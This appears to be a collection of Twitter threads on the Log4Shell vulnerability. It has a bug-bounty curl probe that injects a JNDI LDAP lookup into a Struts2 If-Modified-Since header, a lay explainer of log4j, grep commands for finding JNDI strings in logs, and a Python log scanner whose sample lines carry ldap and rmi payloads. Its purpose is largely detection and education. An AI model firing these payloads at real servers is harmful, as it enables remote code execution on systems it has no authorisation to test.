Discover and read the best of Twitter Threads about #log4jRCE

If you have a Struts2 target, you can try to find if it's vulnerable to #Log4Shell

curl -vv -H "If-Modified-Since: \${jndi:ldap://localhost:80/abc}" http://localhost:8080/struts2-showcase/struts/utils.js

#bugbountytips #log4jRCE #bugbounty #infosec #cybersecurity #redteam 1/n
"DefaultStaticContentLoader" class which loads static assets in Struts2 logs a warning if the date passed in "If-Modified-Since" is invalid.

Reference:

attackerkb.com/topics/in9sPR2…

2/n
List of default static asset paths in Struts2 (taken from the Rapid7 analysis):

tooltip.gif
domtt.css
utils.js
domTT.js
inputtransfersselect.js
optiontransferselect.js

3/n
Explaining #log4j for non-technical people, because the internet is burning down and y'all might want to know what's happening and why there's all this "${jndi:ldap" stuff out there

#Log4Shell #log4jRCE

⬇️
Log4j is a popular logging library used in the Java programming language.

A logger is a piece of software that saves data on a computer. It is used to monitor what is happening, determine if the software runs smoothly, or catch information to help debugging when things go wrong.
It logs a lot of information. When you browse to a website, it will write down what IP address you have, what browser you are using (Firefox, Chrome, Edge...), when you made the request, what page you accessed... and more!
Quick check in the /var/log folder or wherever your apps store their logs

sudo grep -r '${jndi:ldap://' /var/log

#log4j #log4jrce
If you find something, please send me a redacted version of it - I'd like to see log lines of real world exploitation attempts
Improved version

sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi)://' /var/log
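The two grep commands above hunt stored logs for the lookup string, and the Struts2 If-Modified-Since probe from the first thread would land in a web server's access log in exactly the same shape. As an added example that is not from either thread (nor from Rapid7 or the Struts project), here is a small Python scanner that applies the same alternation as the improved egrep (ldap, ldaps or rmi), case-insensitively, after URL-decoding each line so that a lookup string tucked into a query string still matches, and records the scheme and target of every hit. The URL-decoding step, the directory walker, and all log lines, addresses and paths below are my own constructions for illustration.

```python
import os
import re
from urllib.parse import unquote

# Constructed sample log lines for illustration (not real captures). Line 1 mirrors the
# Struts2 If-Modified-Since probe from the first thread, line 2 carries the same lookup
# URL-encoded inside a query string, line 3 uses the rmi scheme with odd casing,
# and line 4 is a benign request that must not match.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /struts2-showcase/struts/utils.js HTTP/1.1" 200 512 "-" "curl/7.79.1" "If-Modified-Since: ${jndi:ldap://203.0.113.10:1389/abc}"
10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET /?x=%24%7Bjndi%3Aldaps%3A%2F%2F203.0.113.10%3A1389%2Fa%7D HTTP/1.1" 200 17 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 17 "-" "${JNDI:rmi://203.0.113.10:1099/obj}"
10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Same alternation as the improved egrep in the thread (ldap, ldaps or rmi), compiled
# case-insensitively, plus a capture of the lookup target up to the closing brace.
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>ldaps?|rmi)://(?P<target>[^}\s\"]*)\}?",
    re.IGNORECASE,
)


def normalise(line, max_rounds=3):
    """Undo URL encoding (repeatedly, to cover double-encoded input) so that a
    lookup string hidden in a query string still matches the plain-text pattern."""
    for _ in range(max_rounds):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    return line


def scan_lines(lines, source="<input>"):
    """Return one dict per matching line: where it was found, which scheme the
    lookup used, what target it pointed at, and the original line text."""
    hits = []
    for number, raw in enumerate(lines, start=1):
        line = raw.rstrip("\r\n")
        match = JNDI_RE.search(normalise(line))
        if match:
            hits.append({
                "source": source,
                "line_no": number,
                "scheme": match.group("scheme").lower(),
                "target": match.group("target"),
                "text": line,
            })
    return hits


def scan_directory(root):
    """Walk a log directory (the thread's /var/log use case) and scan every file,
    skipping ones that cannot be opened; undecodable bytes are replaced, not fatal."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits.extend(scan_lines(fh, source=path))
            except OSError:
                continue
    return hits


if __name__ == "__main__":
    # Run against the constructed sample; swap in scan_directory("/var/log") for real logs.
    for hit in scan_lines(SAMPLE_LOG.splitlines(), source="sample"):
        print(f"{hit['source']}:{hit['line_no']} scheme={hit['scheme']} target={hit['target']}")
```

Matching is done on the decoded copy but the reported text is the original line, so what you forward (redacted) is exactly what the log holds. The scheme and target fields are what you would pull into a redacted report or a blocklist review.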
